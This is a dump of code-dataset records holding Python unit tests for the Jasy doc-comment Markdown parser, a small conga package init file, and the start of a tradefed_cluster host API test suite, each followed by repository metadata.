self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), '<p>Additional arguments can be passed in via <code class="param">options</code>:</p>\n\n<ul>\n<li><p><code class="param">options</code></p>\n\n<ul>\n<li><code class="param">options.x</code></li>\n<li><code class="param">options.y</code></li>\n<li><code class="param">options.foo</code></li>\n<li><code class="param">options.foo.x</code></li>\n<li><code class="param">options.foo.y</code></li>\n</ul></li>\n</ul>\n')
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["options"]), dict)
self.assertEqual(type(comment.params["options"]["fields"]), dict)
self.assertEqual(comment.params["options"]["type"][0]["name"], "Object")
self.assertEqual(type(comment.params["options"]["fields"]["x"]), dict)
self.assertEqual(type(comment.params["options"]["fields"]["y"]), dict)
self.assertEqual(comment.params["options"]["fields"]["x"]["type"][0]["name"], "String")
self.assertEqual(comment.params["options"]["fields"]["y"]["type"][0]["name"], "Number")
self.assertEqual(type(comment.params["options"]["fields"]["foo"]), dict)
self.assertEqual(comment.params["options"]["fields"]["foo"]["type"][0]["name"], "Object")
self.assertEqual(type(comment.params["options"]["fields"]["foo"]["fields"]["x"]), dict)
self.assertEqual(type(comment.params["options"]["fields"]["foo"]["fields"]["y"]), dict)
self.assertEqual(comment.params["options"]["fields"]["foo"]["fields"]["x"]["type"][0]["name"], "String")
self.assertEqual(comment.params["options"]["fields"]["foo"]["fields"]["y"]["type"][0]["name"], "Number")
#
# DOC COMMENTS :: MARKDOWN
#
def test_doc_markdown_formatting(self):
parsed = self.process('''
/**
* This is some **important** text about *Jasy*.
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>This is some <strong>important</strong> text about <em>Jasy</em>.</p>\n")
def test_doc_markdown_quote(self):
parsed = self.process('''
/**
* Items:
*
* - Data
*
* > This is a block quote
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>Items:</p>\n\n<ul>\n<li><p>Data</p>\n\n<blockquote>\n<p>This is a block quote</p>\n</blockquote></li>\n</ul>\n")
def test_doc_markdown_smartypants(self):
parsed = self.process('''
/**
* Text formatting with 'quotes' is pretty nice, too...
*
* It possible to use "different styles" here -- to improve clarity.
*
* Still it keeps code like `this.foo()` intact.
*
* It's also capable of detecting these things: "Joe's Restaurant".
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>Text formatting with 'quotes' is pretty nice, too…</p>\n\n<p>It possible to use “different styles” here – to improve clarity.</p>\n\n<p>Still it keeps code like <code>this.foo()</code> intact.</p>\n\n<p>It's also capable of detecting these things: “Joe's Restaurant”.</p>\n")
def test_doc_markdown_formatting_code(self):
parsed = self.process('''
/**
* This is some example code:
*
* var name = 'jasy';
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), '<p>This is some example code:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span class="kd">var</span> <span class="nx">name</span> <span class="o">=</span> <span class="s1">\'jasy\'</span><span class="p">;</span>\n</pre></div>\n</td></tr></table>\n')
#
# DOC COMMENTS :: CODE
#
def test_doc_markdown_code(self):
parsed = self.process('''
/**
* Some code example:
*
* if (this.isEnabled()) {
* self.callCommand("reload", true);
* }
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), '<p>Some code example:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1\n2\n3</pre></div></td><td class="code"><div class="highlight"><pre><span class="k">if</span> <span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">isEnabled</span><span class="p">())</span> <span class="p">{</span>\n <span class="nx">self</span><span class="p">.</span><span class="nx">callCommand</span><span class="p">(</span><span class="s2">"reload"</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>\n<span class="p">}</span>\n</pre></div>\n</td></tr></table>\n')
def test_doc_markdown_code_single_blockquote(self):
parsed = self.process('''
/**
* Some code example:
*
* self.callCommand("reload", true);
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), '<p>Some code example:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span class="nx">self</span><span class="p">.</span><span class="nx">callCommand</span><span class="p">(</span><span class="s2">"reload"</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>\n</pre></div>\n</td></tr></table>\n')
def test_doc_markdown_code_single_inline(self):
parsed = self.process('''
/**
* Some code example: `self.callCommand("reload", true);`
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), '<p>Some code example: <code>self.callCommand("reload", true);</code></p>\n')
def test_doc_markdown_code_html(self):
parsed = self.process('''
/**
* ## HTML example:
*
* ```html
* <title>My Title</title>
* <link rel="stylesheet" type="text/css" src="style.css"/>
* <script type="text/javascript">alert("Loaded");</script>
* ```
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), '<h2>HTML example:</h2>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1\n2\n3</pre></div></td><td class="code"><div class="highlight"><pre><span class="nt"><title></span>My Title<span class="nt"></title></span>\n<span class="nt"><link</span> <span class="na">rel=</span><span class="s">"stylesheet"</span> <span class="na">type=</span><span class="s">"text/css"</span> <span class="na">src=</span><span class="s">"style.css"</span><span class="nt">/></span>\n<span class="nt"><script </span><span class="na">type=</span><span class="s">"text/javascript"</span><span class="nt">></span><span class="nx">alert</span><span class="p">(</span><span class="s2">"Loaded"</span><span class="p">);</span><span class="nt"></script></span>\n</pre></div>\n</td></tr></table>\n')
if __name__ == '__main__':
logging.getLogger().setLevel(logging.ERROR)
suite = unittest.TestLoader().loadTestsFromTestCase(Tests)
unittest.TextTestRunner(verbosity=2).run(suite)
| 36.45 | 1,364 | 0.591907 | 6,544 | 55,404 | 4.978148 | 0.054859 | 0.194309 | 0.095405 | 0.068208 | 0.890383 | 0.854898 | 0.833011 | 0.803143 | 0.786352 | 0.759339 | 0 | 0.011243 | 0.230994 | 55,404 | 1,519 | 1,365 | 36.473996 | 0.753368 | 0.008158 | 0 | 0.692388 | 0 | 0.040667 | 0.400667 | 0.10793 | 0 | 0 | 0 | 0 | 0.476538 | 1 | 0.064651 | false | 0.004171 | 0.004171 | 0 | 0.070907 | 0.001043 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b84ef6ce0a947c98b0e87a00e9886593ee322f74 | 92 | py | Python | conga/tcrdist/__init__.py | sschattgen/conga-dev | 4d027629d409720833ca5571072e9fba7294a682 | [
"MIT"
] | null | null | null | conga/tcrdist/__init__.py | sschattgen/conga-dev | 4d027629d409720833ca5571072e9fba7294a682 | [
"MIT"
] | null | null | null | conga/tcrdist/__init__.py | sschattgen/conga-dev | 4d027629d409720833ca5571072e9fba7294a682 | [
"MIT"
] | null | null | null | from . import make_tcr_logo
from . import tcr_distances
from . import make_10x_clones_file
| 18.4 | 34 | 0.826087 | 15 | 92 | 4.666667 | 0.6 | 0.428571 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025316 | 0.141304 | 92 | 4 | 35 | 23 | 0.860759 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
b8a1486cf0c96fe683f53ab90cbd0bc0ff52e6aa | 105,868 | py | Python | tradefed_cluster/cluster_host_api_test.py | maksonlee/tradefed_cluster | d1153743ce8ddcad752443b23851015630862aea | [
"Apache-2.0"
] | null | null | null | tradefed_cluster/cluster_host_api_test.py | maksonlee/tradefed_cluster | d1153743ce8ddcad752443b23851015630862aea | [
"Apache-2.0"
] | null | null | null | tradefed_cluster/cluster_host_api_test.py | maksonlee/tradefed_cluster | d1153743ce8ddcad752443b23851015630862aea | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for cluster_host_api."""
import datetime
import unittest
import mock
from protorpc import protojson
from tradefed_cluster.util import ndb_shim as ndb
from tradefed_cluster import api_messages
from tradefed_cluster import api_test
from tradefed_cluster import common
from tradefed_cluster import cluster_host_api
from tradefed_cluster import datastore_entities
from tradefed_cluster import datastore_test_util
from tradefed_cluster import device_manager
from tradefed_cluster import note_manager
class ClusterHostApiTest(api_test.ApiTest):
TIMESTAMP = datetime.datetime(2015, 10, 9)
def setUp(self):
api_test.ApiTest.setUp(self)
self.ndb_host_0 = datastore_test_util.CreateHost(
cluster='free',
hostname='host_0',
timestamp=self.TIMESTAMP,
host_state=api_messages.HostState.RUNNING,
device_count_timestamp=self.TIMESTAMP,
device_count_summaries=[
datastore_test_util.CreateDeviceCountSummary(
run_target='run_target1', available=3, allocated=7)
],
pools=['pool_1'])
self.ndb_device_0 = datastore_test_util.CreateDevice(
cluster='free',
hostname='host_0',
device_serial='device_0',
device_type=api_messages.DeviceTypeMessage.EMULATOR,
battery_level='100',
hidden=True)
self.ndb_device_1 = datastore_test_util.CreateDevice(
cluster='free',
hostname='host_0',
device_serial='device_1',
device_type=api_messages.DeviceTypeMessage.EMULATOR,
timestamp=self.TIMESTAMP)
self.ndb_host_1 = datastore_test_util.CreateHost(
cluster='paid',
hostname='host_1',
device_count_timestamp=self.TIMESTAMP,
timestamp=self.TIMESTAMP,
hidden=True,
device_count_summaries=[
datastore_test_util.CreateDeviceCountSummary(
run_target='run_target1', available=1, allocated=1)
])
self.ndb_device_2 = datastore_test_util.CreateDevice(
cluster='paid',
hostname='host_1',
device_serial='device_2',
device_type=api_messages.DeviceTypeMessage.EMULATOR,
hidden=True)
self.ndb_device_3 = datastore_test_util.CreateDevice(
cluster='paid',
hostname='host_1',
device_serial='device_3',
device_type=api_messages.DeviceTypeMessage.EMULATOR,
hidden=True)
self.ndb_host_2 = datastore_test_util.CreateHost(
cluster='free',
hostname='host_2',
lab_name='alab',
assignee='auser',
device_count_timestamp=self.TIMESTAMP,
timestamp=self.TIMESTAMP,
device_count_summaries=[
datastore_test_util.CreateDeviceCountSummary(
run_target='run_target1', offline=4, available=0, allocated=1)
])
self.ndb_host_3 = datastore_test_util.CreateHost(
cluster='paid', hostname='host_3', lab_name='alab',
timestamp=self.TIMESTAMP)
self.note = datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_0',
user='user0',
timestamp=self.TIMESTAMP,
message='Hello, World')
self.note.put()
def AssertEqualHostInfo(self, host_entity, host_message):
# Helper to compare host entities and messages
self.assertEqual(host_entity.hostname, host_message.hostname)
self.assertEqual(host_entity.total_devices, host_message.total_devices)
self.assertEqual(host_entity.offline_devices, host_message.offline_devices)
self.assertEqual(host_entity.available_devices,
host_message.available_devices)
self.assertEqual(host_entity.allocated_devices,
host_message.allocated_devices)
self.assertEqual(host_entity.device_count_timestamp,
host_message.device_count_timestamp)
self.assertEqual(host_entity.physical_cluster, host_message.cluster)
self.assertEqual(host_entity.hidden, host_message.hidden)
self.assertEqual(host_entity.test_harness_version,
host_message.test_runner_version)
self.assertEqual(host_entity.test_harness, host_message.test_runner)
self.assertEqual(host_entity.test_harness_version,
host_message.test_harness_version)
self.assertEqual(host_entity.test_harness, host_message.test_harness)
def testListHosts(self):
"""Tests ListHosts returns all visible hosts."""
api_request = {}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(3, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertEqual(0, len(host.device_infos))
if host.hostname == 'host_0':
self.AssertEqualHostInfo(self.ndb_host_0, host)
elif host.hostname == 'host_2':
self.AssertEqualHostInfo(self.ndb_host_2, host)
elif host.hostname == 'host_3':
self.AssertEqualHostInfo(self.ndb_host_3, host)
else:
# host_1 is hidden and should not be reported
self.fail()
def testListHosts_shouldContainDevices(self):
"""Tests ListHosts returns hosts and include visible devices."""
api_request = {'include_devices': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
for host in host_collection.host_infos:
if host.hostname == 'host_0':
self.AssertEqualHostInfo(self.ndb_host_0, host)
self.assertEqual(1, len(host.device_infos))
elif host.hostname == 'host_2':
self.AssertEqualHostInfo(self.ndb_host_2, host)
self.assertEqual(0, len(host.device_infos))
elif host.hostname == 'host_3':
self.AssertEqualHostInfo(self.ndb_host_3, host)
self.assertEqual(0, len(host.device_infos))
else:
# host_1 is hidden and should not be reported
self.fail()
def testListHosts_includeHidden(self):
"""Tests ListHosts returns all hosts includding hidden and devices."""
api_request = {'include_hidden': True, 'include_devices': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(4, len(host_collection.host_infos))
for host in host_collection.host_infos:
if host.hostname == 'host_0':
self.AssertEqualHostInfo(self.ndb_host_0, host)
self.assertEqual(2, len(host.device_infos))
elif host.hostname == 'host_1':
self.AssertEqualHostInfo(self.ndb_host_1, host)
self.assertEqual(2, len(host.device_infos))
elif host.hostname == 'host_2':
self.AssertEqualHostInfo(self.ndb_host_2, host)
self.assertEqual(0, len(host.device_infos))
elif host.hostname == 'host_3':
self.AssertEqualHostInfo(self.ndb_host_3, host)
else:
self.fail()
def testListHosts_withOffset(self):
"""Tests ListHosts returns hosts for a count and offset."""
api_request = {'count': '1'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
self.assertEqual(0, len(host_collection.host_infos[0].device_infos))
def testListHosts_withCursorAndOffset(self):
"""Tests ListHosts returns hosts for a count and offset."""
api_request = {'count': '2'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertTrue(host_collection.more)
cursor = host_collection.next_cursor
self.assertIsNotNone(cursor)
self.assertEqual(2, len(host_collection.host_infos))
self.assertEqual('host_0', host_collection.host_infos[0].hostname)
self.assertEqual('host_2', host_collection.host_infos[1].hostname)
self.assertEqual(0, len(host_collection.host_infos[0].device_infos))
api_request = {'count': '2', 'cursor': cursor}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertFalse(host_collection.more)
self.assertIsNone(host_collection.next_cursor)
self.assertEqual(1, len(host_collection.host_infos))
self.assertEqual('host_3', host_collection.host_infos[0].hostname)
def testListHosts_withDevicesOffset(self):
"""Tests ListHosts returns hosts with devices for a count and offset."""
api_request = {'include_devices': True, 'count': '1'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
self.assertEqual(1, len(host_collection.host_infos[0].device_infos))
def testListHosts_includeHiddenWithCount(self):
"""Tests ListHosts includes hidden applying a count and offset."""
api_request = {'include_hidden': True, 'count': '1'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
self.assertEqual(0, len(host_collection.host_infos[0].device_infos))
def testListHosts_includeHiddenWithDevicesCount(self):
"""Tests ListHosts includes hidden applying a count and offset."""
api_request = {
'include_devices': True,
'include_hidden': True,
'count': '1'
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
self.assertEqual(2, len(host_collection.host_infos[0].device_infos))
def testListHosts_filterByLab(self):
"""Tests ListHosts returns hosts the under a lab."""
api_request = {'lab_name': 'alab'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertEqual('alab', host.lab_name)
def testListHosts_filterByAssignee(self):
"""Tests ListHosts returns hosts that assign to certain user."""
api_request = {'assignee': 'auser'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertEqual('auser', host.assignee)
def testListHosts_filterByIsBad(self):
"""Tests ListHosts returns hosts that is bad."""
api_request = {'is_bad': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertTrue(host.is_bad)
def testListHosts_filterByHostGroups(self):
"""Tests ListHosts returns hosts the under host groups."""
api_request = {'host_groups': ['paid']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertEqual('paid', host.host_group)
def testListHosts_filterByHostnames(self):
"""Tests ListHosts returns hosts the under hostnames."""
api_request = {'hostnames': ['host_2']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertEqual('host_2', host.hostname)
def testListHosts_filterByTestHarness(self):
"""Tests ListHosts returns hosts the under a test harness."""
mh_host = datastore_test_util.CreateHost(
cluster='mh_cluster',
hostname='mh_host',
lab_name='mh_lab',
test_harness='MH',
test_harness_version='v1')
mh_host.put()
api_request = {'test_harness': 'MH'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
self.AssertEqualHostInfo(mh_host, host_collection.host_infos[0])
def testListHosts_filterByMultiTestHarness(self):
"""Tests ListHosts returns hosts the under multi test harness."""
mh_host = datastore_test_util.CreateHost(
cluster='mh_cluster',
hostname='mh_host',
lab_name='mh_lab',
test_harness='MH',
test_harness_version='v1')
mh_host.put()
goats_host = datastore_test_util.CreateHost(
cluster='goats_cluster',
hostname='goats_host',
lab_name='goats_lab',
test_harness='GOATS',
test_harness_version='v3.2')
goats_host.put()
api_request = {'test_harness': ['MH', 'TRADEFED']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(4, len(host_collection.host_infos))
def testListHosts_filterByMultiTestHarnessVersions(self):
"""Tests ListHosts returns hosts the under multi test harness versions."""
mh_host = datastore_test_util.CreateHost(
cluster='mh_cluster',
hostname='mh_host',
lab_name='mh_lab',
test_harness='MH',
test_harness_version='v1')
mh_host.put()
goats_host = datastore_test_util.CreateHost(
cluster='goats_cluster',
hostname='goats_host',
lab_name='goats_lab',
test_harness='GOATS',
test_harness_version='v3.2')
goats_host.put()
api_request = {'test_harness_versions': ['v1', 'v3.2']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_collection.host_infos))
def testListHosts_filterByPools(self):
"""Tests ListHosts returns hosts the under pools."""
api_request = {'pools': ['pool_1']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertIn('pool_1', host.pools)
def testListHosts_filterByHostStates(self):
"""Tests ListHosts returns hosts the under host states."""
host_4 = datastore_test_util.CreateHost(
cluster='paid',
hostname='host_4',
lab_name='alab',
host_state=api_messages.HostState.KILLING,
)
host_4.put()
api_request = {'host_states': ['KILLING', 'RUNNING']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_collection.host_infos))
self.assertEqual('RUNNING', host_collection.host_infos[0].host_state)
self.assertEqual('KILLING', host_collection.host_infos[1].host_state)
def testListHosts_filterByHostUpdateStates(self):
"""Tests ListHosts returns hosts the under host update states."""
datastore_test_util.CreateHostUpdateState(
'host_0', state=api_messages.HostUpdateState.SUCCEEDED)
datastore_test_util.CreateHostUpdateState(
'host_2', state=api_messages.HostUpdateState.ERRORED)
api_request = {'host_update_states': ['SUCCEEDED', 'ERRORED']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_collection.host_infos))
self.assertEqual('SUCCEEDED', host_collection.host_infos[0].update_state)
self.assertEqual('ERRORED', host_collection.host_infos[1].update_state)
def testListHosts_filterByExtraInfo(self):
"""Tests ListHosts returns hosts the under extra info."""
extra_info_0 = {}
extra_info_0['url'] = 'abc.com'
extra_info_0['host_ip'] = '1.2.3.4'
host_01 = datastore_test_util.CreateHost(
cluster='free',
hostname='host_01',
host_state=api_messages.HostState.RUNNING,
extra_info=extra_info_0)
api_request = {'flated_extra_info': 'host_ip:1.2.3.4'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
self.assertEqual(host_collection.host_infos[0].hostname, host_01.hostname)
def testListHosts_filterByTimestamp(self):
"""Tests ListHosts can filter by timestmap."""
self.ndb_host_0.timestamp = datetime.datetime(2020, 8, 8, 12, 13)
self.ndb_host_0.put()
api_request = {
'timestamp_operator': 'LESS_THAN',
'timestamp': '2020-8-7T12:20:30'
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_collection.host_infos))
for host in host_collection.host_infos:
if host.hostname == 'host_2':
self.AssertEqualHostInfo(self.ndb_host_2, host)
elif host.hostname == 'host_3':
self.AssertEqualHostInfo(self.ndb_host_3, host)
else:
# host_1 is hidden and should not be reported
self.fail()
def testListHosts_invalidTimestampFilter(self):
"""Tests ListHosts with invalid timestmap filter."""
api_request = {
'timestamp_operator': 'LESS_THAN',
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request, expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)
def testListHosts_filterByRecoveryState(self):
"""Tests ListHosts returns hosts for certain recovery states."""
self.ndb_host_0.recovery_state = common.RecoveryState.ASSIGNED
self.ndb_host_0.assignee = 'user1'
self.ndb_host_0.put()
self.ndb_host_2.recovery_state = common.RecoveryState.FIXED
self.ndb_host_2.assignee = 'user1'
self.ndb_host_2.put()
api_request = {'recovery_states': ['ASSIGNED', 'FIXED']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_collection.host_infos))
self.assertEqual('ASSIGNED', host_collection.host_infos[0].recovery_state)
self.assertEqual('FIXED', host_collection.host_infos[1].recovery_state)
def testListHosts_includeHostUpdateState(self):
display_message_0 = 'some display message.'
host_update_state_0 = datastore_entities.HostUpdateState(
id=self.ndb_host_0.hostname,
hostname=self.ndb_host_0.hostname,
state=api_messages.HostUpdateState.SYNCING,
display_message=display_message_0)
host_update_state_2 = datastore_entities.HostUpdateState(
id=self.ndb_host_2.hostname,
hostname=self.ndb_host_2.hostname,
state=api_messages.HostUpdateState.RESTARTING)
ndb.put_multi(
[host_update_state_0, host_update_state_2])
api_request = {}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(3, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertEqual(0, len(host.device_infos))
if host.hostname == 'host_0':
self.AssertEqualHostInfo(self.ndb_host_0, host)
self.assertEqual('SYNCING', host.update_state)
self.assertEqual(display_message_0, host.update_state_display_message)
elif host.hostname == 'host_2':
self.AssertEqualHostInfo(self.ndb_host_2, host)
self.assertEqual('RESTARTING', host.update_state)
self.assertIsNone(host.update_state_display_message)
elif host.hostname == 'host_3':
self.AssertEqualHostInfo(self.ndb_host_3, host)
self.assertIsNone(host.update_state)
else:
# host_1 is hidden and should not be reported
self.fail()
@mock.patch.object(note_manager, 'PublishMessage')
def testAddOrUpdateHostNote_addWithTextOfflineReasonAndRecoveryAction(
self, mock_publish_host_note_message):
"""Tests adding a non-existing host note."""
lab_name = 'lab-name-1'
api_request = {
'hostname': self.ndb_host_0.hostname,
'user': 'user-1',
'message': 'message-1',
'offline_reason': 'offline-reason-1',
'recovery_action': 'recovery-action-1',
'lab_name': lab_name,
'event_time': self.TIMESTAMP.isoformat(),
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote', api_request)
self.assertEqual('200 OK', api_response.status)
host_note = protojson.decode_message(api_messages.Note,
api_response.body)
host_note_event = api_messages.NoteEvent(
note=host_note, lab_name=lab_name)
# Assert datastore id is generated.
self.assertIsNotNone(host_note.id)
# Assert fields equal.
self.assertEqual(api_request['hostname'], host_note.hostname)
self.assertEqual(api_request['user'], host_note.user)
self.assertEqual(api_request['message'], host_note.message)
self.assertEqual(api_request['offline_reason'], host_note.offline_reason)
self.assertEqual(api_request['recovery_action'], host_note.recovery_action)
self.assertEqual(api_request['event_time'],
